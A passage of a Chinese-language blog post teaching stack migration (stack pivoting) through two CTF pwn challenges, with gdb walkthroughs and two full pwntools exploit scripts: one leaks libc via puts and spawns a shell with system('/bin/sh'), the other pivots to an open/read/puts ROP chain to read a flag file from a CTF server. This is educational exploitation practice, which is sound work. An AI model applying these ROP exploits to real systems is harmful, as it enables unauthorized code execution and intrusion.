class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>gcc  -z relro -z now -fno-stack-protector -mpreferred-stack-boundary=2 migration.c -o migration</code> 编译命令</p>
<h4 id="简单分析"><a href="#简单分析" class="headerlink" title="简单分析"></a>简单分析</h4><p>这个题纯粹就是为了练习的Stack Migration用的，可以不分析代码直接用gdb-peda直接来测试：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://q5j29gptn.bkt.clouddn.com/15813398610900.jpg" alt="-w332" title>
                </div>
                <div class="image-caption">-w332</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://q5j29gptn.bkt.clouddn.com/15813398926858.jpg" alt="-w955" title>
                </div>
                <div class="image-caption">-w955</div>
            </figure>
<p>熟悉的栈溢出，但是下面多出来的一些字符串，也是程序不能接受的部分，也可以作为一个需要考虑栈迁移的标志。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1og2r9.jpg" alt="1og2r9.jpg" title>
                </div>
                <div class="image-caption">1og2r9.jpg</div>
            </figure>
<p>注意一下rsp被覆盖的值。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1ogs8U.jpg" alt="1ogs8U.jpg" title>
                </div>
                <div class="image-caption">1ogs8U.jpg</div>
            </figure>
<p>计算padding为48.</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1ogwEq.jpg" alt="1ogwEq.jpg" title>
                </div>
                <div class="image-caption">1ogwEq.jpg</div>
            </figure>
<p>计算一下，可以填入多少的可控字段。去除一下刚刚程序不能存入的部分和padding部分，还有80个字节可以用。其中一个来伪造new esp，剩下也就还有9个gadget可以用，可以给我构造第一个rop链。</p>
<h4 id="图解分析"><a href="#图解分析" class="headerlink" title="图解分析"></a>图解分析</h4><p>假设我们已经填入了溢出字符，buf1即为我们要去的新栈，这个选择bss段的后一半：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1ogabn.jpg" alt="1ogabn.jpg" title>
                </div>
                <div class="image-caption">1ogabn.jpg</div>
            </figure>
<p>开始执行一下leave 中的<code>mov rsp,rbp</code>：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1ogUDs.jpg" alt="1ogUDs.jpg" title>
                </div>
                <div class="image-caption">1ogUDs.jpg</div>
            </figure>
<p>此时rsp 也指向了 rbp指向的位置，在执行leave中的<code>pop rbp</code>:</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1ocMfU.jpg" alt="1ocMfU.jpg" title>
                </div>
                <div class="image-caption">1ocMfU.jpg</div>
            </figure>
<p>此时rbp已经到了我们伪造的新栈buf1，然后开始执行ret,进入执行pop_rdi的gadget:</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1ocZmn.jpg" alt="1ocZmn.jpg" title>
                </div>
                <div class="image-caption">1ocZmn.jpg</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1ocklQ.jpg" alt="1ocklQ.jpg" title>
                </div>
                <div class="image-caption">1ocklQ.jpg</div>
            </figure>

<p>此时已经将buf1的地址，推入rdi，作为gets的参数，执行gets函数后，我们就可以往buf1上填入我们的rop链，此时栈大小已经没有限制了，可以任意写。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1o6oo6.jpg" alt="1o6oo6.jpg" title>
                </div>
                <div class="image-caption">1o6oo6.jpg</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1o6gWF.jpg" alt="1o6gWF.jpg" title>
                </div>
                <div class="image-caption">1o6gWF.jpg</div>
            </figure>
<p>在这个buf1的栈空间里，我们需要先把rbp指向的位置写入buf2（下一个构造的新栈），然后构造rop链把puts的内存地址给泄露出来，进而可以算出libc的基地址，接着再构造一个gets函数。接着是执行一下leave 的gadget：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1o60Ln.jpg" alt="1o60Ln.jpg" title>
                </div>
                <div class="image-caption">1o60Ln.jpg</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1o6NRg.jpg" alt="1o6NRg.jpg" title>
                </div>
                <div class="image-caption">1o6NRg.jpg</div>
            </figure>
<p>执行完以后就可以发现我们，已经完全控制了栈。并且开了一个buf2的新栈，留着在buf1调用gets函数时来在buf2新栈中摆上调用system(/bin/sh)函数的rop链。然后继续执行：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1o6tJS.jpg" alt="1o6tJS.jpg" title>
                </div>
                <div class="image-caption">1o6tJS.jpg</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1o6Yi8.jpg" alt="1o6Yi8.jpg" title>
                </div>
                <div class="image-caption">1o6Yi8.jpg</div>
            </figure>
<p>这就泄露出了puts函数的内存地址。接着开始往buf2新栈上读rop链:</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1o6lqI.jpg" alt="1o6lqI.jpg" title>
                </div>
                <div class="image-caption">1o6lqI.jpg</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1o6QsA.jpg" alt="1o6QsA.jpg" title>
                </div>
                <div class="image-caption">1o6QsA.jpg</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1o6VIK.jpg" alt="1o6VIK.jpg" title>
                </div>
                <div class="image-caption">1o6VIK.jpg</div>
            </figure>
<p>读入完成，接着再次执行leave的gadget：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1o6AVx.jpg" alt="1o6AVx.jpg" title>
                </div>
                <div class="image-caption">1o6AVx.jpg</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1oyk4S.jpg" alt="1oyk4S.jpg" title>
                </div>
                <div class="image-caption">1oyk4S.jpg</div>
            </figure>
<p>可以看到esp到了新栈，rbp因为刚刚在buf2填入的buf1，又会到了buf1，这个地址可以随便填了，对做题不影响，填写这个只是可以看到再次栈转移。接着执行buf2新栈的rop链：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1os600.jpg" alt="1os600.jpg" title>
                </div>
                <div class="image-caption">1os600.jpg</div>
            </figure>
<p>就可以拿到shell了。</p>
<h3 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h3><p>借着这个思路就可以开始写exp:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">import time</span><br><span class="line">context.arch = &apos;amd64&apos;</span><br><span class="line">context.log_level = &apos;debug&apos;</span><br><span class="line">e = ELF(&apos;./test&apos;)</span><br><span class="line">l = ELF(&apos;/lib/x86_64-linux-gnu/libc-2.23.so&apos;) </span><br><span class="line"># io = remote(&apos;127.0.0.1&apos;,4000)</span><br><span class="line">io = process(&apos;./test&apos;)</span><br><span class="line">pop_rdi_ret = 0x400703</span><br><span class="line">pop_rsi_r15_ret= 0x0400701</span><br><span class="line">pop_rdx_ret= 0x0400724</span><br><span class="line">leave_ret= 0x0400699</span><br><span class="line">buf1 = 0x00602000 - 0x200</span><br><span class="line">buf2 = buf1 + 0x100</span><br><span class="line">padding = 56 - 8</span><br><span class="line">puts_plt = e.symbols[&apos;puts&apos;]</span><br><span class="line">puts_got = e.got[&apos;puts&apos;]</span><br><span class="line">read_add = e.symbols[&apos;read&apos;]</span><br><span class="line">io.recvuntil(&apos;:&apos;)</span><br><span class="line">p = &apos;a&apos;*padding + flat([buf1,pop_rdi_ret,0,pop_rsi_r15_ret,buf1,0,pop_rdx_ret,0x100,read_add,leave_ret])</span><br><span class="line">#raw_input(&apos;-&gt;&apos;)</span><br><span class="line">io.send(p)</span><br><span class="line">sleep(0.1)</span><br><span class="line">p = flat([buf2,pop_rdi_ret,puts_got,puts_plt,pop_rdi_ret,0,pop_rsi_r15_ret,buf2,0,pop_rdx_ret,0x100,read_add,leave_ret])</span><br><span class="line">sleep(0.1)</span><br><span class="line">#raw_input(&apos;-&gt;&apos;)</span><br><span class="line">io.sendline(p)</span><br><span class="line">io.recvuntil(&apos;\n&apos;)</span><br><span class="line">puts = u64((io.recv(6)).ljust(8,&apos;\x00&apos;))</span><br><span class="line">libc = puts - l.symbols[&apos;puts&apos;]</span><br><span class="line">print(&apos;libc_base:&apos; + hex(libc))</span><br><span class="line">binsh_add = l.search(&apos;/bin/sh\x00&apos;).next() + libc</span><br><span class="line">#print(binsh_add)</span><br><span class="line"># raw_input(&apos;-&gt;&apos;)</span><br><span class="line">system_add = l.symbols[&apos;system&apos;] + libc</span><br><span class="line">p = flat([buf1,pop_rdi_ret,binsh_add,system_add])</span><br><span class="line">sleep(0.1)</span><br><span class="line">io.sendline(p)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="Hgame2020-week2-rop-level2"><a href="#Hgame2020-week2-rop-level2" class="headerlink" title="Hgame2020_week2_rop_level2"></a>Hgame2020_week2_rop_level2</h3><h4 id="查保护和arch-1"><a href="#查保护和arch-1" class="headerlink" title="查保护和arch"></a>查保护和arch</h4><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1os8OI.jpg" alt="1os8OI.jpg" title>
                </div>
                <div class="image-caption">1os8OI.jpg</div>
            </figure>
<p>32位程序，开了nx保护</p>
<h4 id="ida分析-2"><a href="#ida分析-2" class="headerlink" title="ida分析"></a>ida分析</h4><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1osEO1.md.jpg" alt="1osEO1.md.jpg" title>
                </div>
                <div class="image-caption">1osEO1.md.jpg</div>
            </figure>
<p>这个明显的栈溢出，但是0x60-0x50-0x8 = 8。发现只有一个gadget位置，无法构造我们想要的rop链。但是前面的第一个read函数，可以读入很大空间，并且第二个参数buf的地址是固定的。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1orMMn.jpg" alt="1orMMn.jpg" title>
                </div>
                <div class="image-caption">1orMMn.jpg</div>
            </figure>
<p>那这个题明显就是可以Stack Migration来解决问题了，并且只需再写一个leave ret就控制栈了。</p>
<h5 id="攻击思路"><a href="#攻击思路" class="headerlink" title="攻击思路"></a>攻击思路</h5><p>程序中有着open，read，puts函数，我们可以写一个rop链，调用open函数，控制其参数是<code>./flag</code>，并在gdb中调试将其返回的文件fd号记录下来，然后传递给read函数，让其读入文件内容存入某个缓冲区，再用puts函数输出一下flag文件的内容即可。在第一个read的时候，我们就需要写好rop链。然后在最后一个read函数时，控制好ebp指向我们的新栈。</p>
<h4 id="EXP-1"><a href="#EXP-1" class="headerlink" title="EXP"></a>EXP</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">context.log_level = &apos;debug&apos;</span><br><span class="line">context.arch = &apos;amd64&apos;</span><br><span class="line"># io = process(&apos;./ROP&apos;)</span><br><span class="line">io = remote(&apos;47.103.214.163&apos;,20300)</span><br><span class="line">e = ELF(&apos;./ROP&apos;)</span><br><span class="line">buf = 0x06010A0</span><br><span class="line"># libc = e.libc</span><br><span class="line">padding = 80</span><br><span class="line">leave_ret = 0x040090d</span><br><span class="line">pop_rdi_ret = 0x00400a43</span><br><span class="line">pop_rsi_r15 = 0x00400a41</span><br><span class="line">open_plt = 0x4007b0</span><br><span class="line">read_plt = 0x400780</span><br><span class="line">puts_plt = 0x400760</span><br><span class="line">io.recvuntil(&apos;think so?\n&apos;)</span><br><span class="line">p = flat([&apos;./flag\x00\x00&apos;,pop_rdi_ret,buf,pop_rsi_r15,0,0,open_plt,pop_rdi_ret,4,pop_rsi_r15,buf+0x80,0,read_plt,pop_rdi_ret,buf+0x80,puts_plt])</span><br><span class="line">io.sendline(p)</span><br><span class="line">io.recvuntil(&apos;\n&apos;)</span><br><span class="line">p = padding * &apos;a&apos; + p64(buf) + p64(leave_ret)</span><br><span class="line">raw_input(&apos;-&gt;&apos;) #手动下一个断点，以后让gdb附加上进行调试</span><br><span class="line">io.send(p)</span><br><span class="line">flag = io.recvline_contains(&apos;hgame&apos;)</span><br><span class="line">print(flag)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<p>我们跟着exp来调试一下，看看效果：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1or3ZV.jpg" alt="1or3ZV.jpg" title>
                </div>
                <div class="image-caption">1or3ZV.jpg</div>
            </figure>
<p>此时的esp是我们伪造的new esp，已经指向了我们的目标位置，并且第一个rop链接已经送过去，可以看到<code>./flag</code>的字眼。执行一下leave：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1orGIU.jpg" alt="1orGIU.jpg" title>
                </div>
                <div class="image-caption">1orGIU.jpg</div>
            </figure>
<p>可以看到rbp的值已经等于我们伪造的值，esp还在原来栈上。接着执行ret，进入下一个leave ret：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1orQrq.jpg" alt="1orQrq.jpg" title>
                </div>
                <div class="image-caption">1orQrq.jpg</div>
            </figure>
<p>先记录下当前的状态，开始执行leave：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1or8aT.jpg" alt="1or8aT.jpg" title>
                </div>
                <div class="image-caption">1or8aT.jpg</div>
            </figure>
<p>执行完发现esp已经到达了新栈buf+8的位置，此时的栈帧已经是我们完全想要的，已经劫持了程序流程，并且新栈空间很大，可以满足我们的需求。ebp是多少已经不重要了，我们直接填入<code>./flag</code>，这个固定地址也做为给open函数做参数。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1ormGQ.jpg" alt="1ormGQ.jpg" title>
                </div>
                <div class="image-caption">1ormGQ.jpg</div>
            </figure>
<p>在调试的时候，执行完open函数需要把返回的fd值记录下，给read函数做参数。最后由puts函数在输出flag：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1oDzPe.jpg" alt="1oDzPe.jpg" title>
                </div>
                <div class="image-caption">1oDzPe.jpg</div>
            </figure>
<h3 id="Stack-Migration小总结"><a href="#Stack-Migration小总结" class="headerlink" title="Stack Migration小总结"></a>Stack Migration小总结</h3><p> 这下可以总结下利用思路也就是</p>
<ul>
<li>把控好起初栈的ebp，在里面写入需要伪造的new esp</li>
<li>在之后的可利用字节中写入leave gadget</li>
<li>将想执行的ROP Chain写在已知固定位置上</li>
<li>再利用leave搬移Stack位置到已知位置</li>
<li>然后无限接ROP Chain</li>
</ul>

        </div>

        <blockquote class="post-copyright">
    
    <div class="content">
        
<span class="post-time">
    Last updated: <time datetime="2020-02-11T09:00:34.000Z" itemprop="dateUpdated">2020-02-11 17:00:34</time>
</span><br>


        
    </div>
    
    <footer>
        <a href="http://chumen77.xyz">
            <img src="/img/avatar.jpg" alt="chumen77">
            chumen77
        </a>
    </footer>
</blockquote>

        


        <div class="post-footer">
            

            
<div class="page-share-wrap">
    

<div class="page-share" id="pageShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=http://chumen77.xyz/2020/02/05/花式栈溢出（调节栈帧）/&title=《花式栈溢出（栈帧的调节）》 — Welcome to Chumen77's Blog&pic=http://chumen77.xyz/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=http://chumen77.xyz/2020/02/05/花式栈溢出（调节栈帧）/&title=《花式栈溢出（栈帧的调节）》 — Welcome to Chumen77's Blog&source=" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=http://chumen77.xyz/2020/02/05/花式栈溢出（调节栈帧）/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《花式栈溢出（栈帧的调节）》 — Welcome to Chumen77's Blog&url=http://chumen77.xyz/2020/02/05/花式栈溢出（调节栈帧）/&via=http://chumen77.xyz" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=http://chumen77.xyz/2020/02/05/花式栈溢出（调节栈帧）/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>



    <a href="javascript:;" id="shareFab" class="page-share-fab waves-effect waves-circle">
        <i class="icon icon-share-alt icon-lg"></i>
    </a>
</div>



        </div>
    </div>

    
<nav class="post-nav flex-row flex-justify-between">
  
    <div class="waves-block waves-effect prev">
      <a href="/2020/02/11/Stack Migration题目练习/" id="post-prev" class="post-nav-link">
        <div class="tips"><i class="icon icon-angle-left icon-lg icon-pr"></i> Prev</div>
        <h4 class="title">Stack Migration题目练习</h4>
      </a>
    </div>
  

  
    <div class="waves-block waves-effect next">
      <a href="/2020/02/03/ROP练习/" id="post-next" class="post-nav-link">
        <div class="tips">Next <i class="icon icon-angle-right icon-lg icon-pl"></i></div>
        <h4 class="title">ROP题目练习</h4>
      </a>
    </div>
  
</nav>



    




















</article>



</div>

        <footer class="footer">
    <div class="top">
        
<p>
    <span id="busuanzi_container_site_uv" style='display:none'>
        站点总访客数：<span id="busuanzi_value_site_uv"></span>
    </span>
    <span id="busuanzi_container_site_pv" style='display:none'>
        站点总访问量：<span id="busuanzi_value_site_pv"></span>
    </span>
</p>


        <p>
            
                <span><a href="/atom.xml" target="_blank" class="rss" title="rss"><i class="icon icon-lg icon-rss"></i></a></span>
            
            <span>This blog is licensed under a <a rel="license" href="https://creativecommons.org/licenses/by/4.0/">Creative Commons Attribution 4.0 International License</a>.</span>
        </p>
    </div>
    <div class="bottom">
        <p><span>chumen77 &copy; 2019 - 2020</span>
            <span>
                
                <a href="http://www.miitbeian.gov.cn/" target="_blank">true</a><br>
                
                Power by <a href="http://hexo.io/" target="_blank">Hexo</a> Theme <a href="https://github.com/yscoder/hexo-theme-indigo" target="_blank">indigo</a>
            </span>
        </p>
    </div>
</footer>

    </main>
    <div class="mask" id="mask"></div>
<a href="javascript:;" id="gotop" class="waves-effect waves-circle waves-light"><span class="icon icon-lg icon-chevron-up"></span></a>



<div class="global-share" id="globalShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=http://chumen77.xyz/2020/02/05/花式栈溢出（调节栈帧）/&title=《花式栈溢出（栈帧的调节）》 — Welcome to Chumen77's Blog&pic=http://chumen77.xyz/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=http://chumen77.xyz/2020/02/05/花式栈溢出（调节栈帧）/&title=《花式栈溢出（栈帧的调节）》 — Welcome to Chumen77's Blog&source=" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=http://chumen77.xyz/2020/02/05/花式栈溢出（调节栈帧）/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《花式栈溢出（栈帧的调节）》 — Welcome to Chumen77's Blog&url=http://chumen77.xyz/2020/02/05/花式栈溢出（调节栈帧）/&via=http://chumen77.xyz" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=http://chumen77.xyz/2020/02/05/花式栈溢出（调节栈帧）/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>


<div class="page-modal wx-share" id="wxShare">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <p>扫一扫，分享到微信</p>
    <img src="//api.qrserver.com/v1/create-qr-code/?data=http://chumen77.xyz/2020/02/05/花式栈溢出（调节栈帧）/" alt="微信分享二维码">
</div>




    <script src="//cdn.bootcss.com/node-waves/0.7.4/waves.min.js"></script>
<script>
var BLOG = { ROOT: '/', SHARE: true, REWARD: false };


</script>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/main.min.js"></script>


<div class="search-panel" id="search-panel">
    <ul class="search-result" id="search-result"></ul>
</div>
<template id="search-tpl">
<li class="item">
    <a href="{path}" class="waves-block waves-effect">
        <div class="title ellipsis" title="{title}">{title}</div>
        <div class="flex-row flex-middle">
            <div class="tags ellipsis">
                {tags}
            </div>
            <time class="flex-col time">{date}</time>
        </div>
    </a>
</li>
</template>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/search.min.js" async></script>






<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>



<script>
(function() {
    var OriginTitile = document.title, titleTime;
    document.addEventListener('visibilitychange', function() {
        if (document.hidden) {
            document.title = '死鬼去哪里了！';
            clearTimeout(titleTime);
        } else {
            document.title = '(つェ⊂)咦!又好了!';
            titleTime = setTimeout(function() {
                document.title = OriginTitile;
            },2000);
        }
    });
})();
</script>



</body>
</html>
